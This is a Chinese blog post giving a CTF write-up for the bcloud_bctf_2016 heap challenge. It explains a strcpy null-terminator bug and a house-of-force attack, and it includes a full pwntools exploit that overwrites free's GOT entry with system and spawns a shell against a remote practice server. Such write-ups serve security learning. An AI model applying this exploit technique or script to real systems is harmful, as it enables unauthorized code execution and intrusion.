bcloud_bctf_2016(32位堆,house-of-force)

最新推荐文章于 2023-07-05 11:47:28 发布
最新推荐文章于 2023-07-05 11:47:28 发布
阅读量265 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121216910
版权
这篇博客详细讲述了在bcloud_bctf_2016挑战中,通过发现并利用strcpy溢出漏洞,获取堆地址,修改top_chunk_size,进而控制内存分配,实现对freegot表的劫持,最终执行system调用的攻防过程。作者分享了详细的步骤和exploit代码示例,适合深入理解内存安全和漏洞利用技巧。
摘要由CSDN通过智能技术生成

bcloud_bctf_2016:

参考师傅:https://blog.csdn.net/seaaseesa/article/details/105588058
https://www.cnblogs.com/LynneHuan/p/14616450.html#bcloud_bctf_2016

漏洞分析:

漏洞出现在strcpy那里
如果填满0x40个‘a’,strcpy最后添加的\x00会在v2处,v2是后赋值,指针覆盖了\x00
strcpy接收v2的值直到\x00或换行,但没有\x00,所以接着泄露了堆的地址
请添加图片描述
还有也是利用了strcpy,原理也大致类似,让它没了\x00,能控制top_chunk_size
请添加图片描述

大致思路:

1.利用漏洞泄露堆地址,修改top_chunk_size为0xffffffff
2.计算出偏移(偏移=target_addr - top_chunk_ptr - 两个chunk头)
3.运用house of force分配到target_addr,这里为bss段的指针数组
4.改指针,劫持free got泄露libc,再劫持free got为system,并在指针数组里有个指向/bin/sh的指针,并写入/bin/sh

exp:

from pwn import *
#from LibcSearcher import * 
local_file  = './bcloud_bctf_2016'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',27684 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#-------------------------------
def add(size,content):
        sla('option--->>\n','1')
        sla('Input the length of the note content:\n',str(size))
        sa('Input the content:\n',content)
def edit(index,content):
        sla('option--->>\n','3')
        sla('Input the id:',str(index))
        sa('Input the new content:',content)
def delete(index):
        sla('option--->>\n','4')
        sla('Input the id:\n',str(index))

#--------------------------------------
sa('Input your name:\n','a'*0x40)
ru('a'*0x40)
heap_addr=u32(rc(4))
print hex(heap_addr)
sa('Org:\n','b'*0x40)
sla('Host:\n',p32(0xFFFFFFFF))
top_chunk_ptr=heap_addr+0xd0
heap_array_addr = 0x0804B120
offest=heap_array_addr-top_chunk_ptr-0x10
add(offest,'')#0
add(0x18,'\n')
edit(1,p32(0) + p32(elf.got['free']) + p32(elf.got['puts']) + p32(0x0804B130) + '/bin/sh\x00')
edit(1,p32(elf.plt['puts']) + '\n')
delete(2)
#rc(1)
libc_base=u32(rc(4))-libc.sym['puts']
print hex(libc_base)
system=libc_base+libc.sym['system']
edit(1,p32(system) + '\n')
delete(3)
#debug()
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-9
weixin_44145820的博客
04-17 1490
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
bcloud_bctf_2016
z1r0的博客
02-26 421
bcloud_bctf_2016 查看保护 程序开头有两个漏洞第一个漏洞在这里,填满0x40个数据时可以将后面的的地址给输出出来。 接着这里将s给填满0x40,接着填入0xffffffff。就可以将top chunk的size改为-1也就是0xffffffff。 攻击思路:因为可以改top chunk的size。笔者这里使用house of force这个攻击手法。因为可以泄露地址,借助地址将地址申请到存放heap的地址那里(这个时候就可以改heap的地址),将heap的地址改成free的got
bcloud_bctf_2016(house of force)
seaaseesa的博客
04-17 1271
bcloud_bctf_2016 首先检查一下程序的保护机制 然后,我们用IDA分析一下,主逻辑里面没有什么问题 漏洞点在于最开始的地方,输入name的时候,由于malloc是在输入之后,因此,v2处s的0截断字符会被覆盖为指针,从而strcpy的时候把指针的值也复制进去,造成了地址泄露。 另一个漏洞在于这里,也是同样的问题,可以造成top chunk的size被修改为v...
2016 BCTF bcloud
yms0211的博客
09-27 335
house of force练习题 :2016 BCTF bcloud
house-of-force-bctf2016_bcloud
csdn546229768的博客
01-28 1049
题目:bctf2016_bcloud 不得不说这题细节做的真好,如果不认真看还真找不到利用点 保护 分析 main函数: add函数: 因为在malloc是加上了4所以通过这里off-by-null行不通 dele、edit函数没有常见漏洞 重要函数 0x80487A1函数: 0x804868D函数: 注意看我注释上面的序号 当我输入长度为0x40时,经过read函数会在后面填充一个null字节,但是因为原本这块栈空间本来就经过了初始化全是null,所以并不会对数据造成影响,到了第二步malloc
bcloud_bctf_2016【buuctf刷题】
最新发布
m0_73756460的博客
07-05 139
bcloud_bctf_2016【buu刷题】
2016BCTF-bcloud分析
小强的博客
08-16 1329
这是一道CTF题,涉及到The House of Force技术 文件及writeup可以在http://uaf.io/exploitation/2016/03/20/BCTF-bcloud.html 下载,另外还有http://www.freebuf.com/news/topnews/100143.html、https://github.com/ctfs/write-ups-2016/tr
House_of_Force-ctf-bcloud
weixin_30507269的博客
07-06 223
2016 bctf bcloud 下载: https://pan.baidu.com/s/1e-fvhaOJKzBQMxlrweLznw 提取码:ded5 放入ida中首先定位到 main()->init()->set_name() unsigned int set_name() { char name; // [esp+1Ch] [ebp-5Ch] <--注意这里,...
BUUCTF pwn wp 121 - 125
fa1c4的blog
03-24 718
qctf2018_stack2 强网杯2019 拟态 STKOF zctf_2016_note3 bcloud_bctf_2016 hgame2018_flag_server hgame2018_flag_server$ file flag_server;checksec flag_server flag_server: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
BCTF 2016 bcloud
Bill
04-09 1327
BCTF 2016 bcloud 漏洞简介 House of Force: 修改top chunk的size域,来达到我们任意地址读写的目的. 程序运行(主要功能) 1. welcome Input your name: Bill Hey Bill! Welcome to BCTF CLOUD NOTE MANAGE SYSTEM! Now let's set syn...
从wiki 重新打基础之 House Of Force
qq_41071646的博客
08-05 408
这次的暑假集训 感觉学到的东西还是比较可以的, 然后 大概是 16号左右是集训结束 本来的想法呢 是 看看mips 的 东西 但是发现 其实 那里的东西大部分还是栈溢出 然后感觉还是要老老实实的打基础 看看什么时候 (大概是 集训结束 ) 在看看那些东西 现在 先把基础打好,, 这个 House Of Force 刷CTF的时候遇到的 还真的不多 好像基本都没有怎么遇到过这类题目 这个...
buuctf node和本体互换修改free_got为system 整数溢出 32位house of force 数组越界改ret
carol2358的博客
08-18 497
文章目录npuctf_2020_easyheapwustctf2020_number_game npuctf_2020_easyheap 这题和之前的hitcontraining_heapcreator一样…… 让node和本体互换就行了 exp: from pwn import * from LibcSearcher import * local_file = './npuctf_2020_easyheap' local_libc = '/root/glibc-all-in-one/libs/2.
[BUUCTF-pwn] inndy_mailer
weixin_52640415的博客
11-24 285
这个题呀,一言难进,原来作过一个类似的,一个坑忘了,第二次还是跳了。作不出来,搜exp。 但有必要记录一下 32位,got可写,有可写可执行段,PIE打开,无canary,基本是保护全关了。 [*] '/buuctf/402_inndy_mailer/pwn' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE:
buuoj Pwn writeup 126-130
yongbaoii的博客
05-11 285
126 护网杯_2018_gettingstart 保护 程序就这么点,逻辑也简单。 然后有个栈溢出。 然后就修改修改就好了嘛,把v7改成0x7fffffffffffffff,v8改成0.1 exp from pwn import* r = remote("node3.buuoj.cn", 28793) #r = process("./126") payload = 'a' * 0x18 + p64(0x7fffffffffffffff) + p64(0x3FB999999999999A) r.re
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3200
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2751
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 1773
做arm架构下的pwn题某个报错
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1769
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
渗透测试新手指南:CFT入门与实战资源
5. 国内比赛:如XCTF联赛(包括hctf、0ctf、sctf、bctf、actf等),同样具有较高水平,国内的ISCC、360CTF、AliCTF、XDctf、SSCTF等也备受推荐。 6. 博客资源:比赛准备过程中,选手可以通过诸如《蓝莲花》、0ops网...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值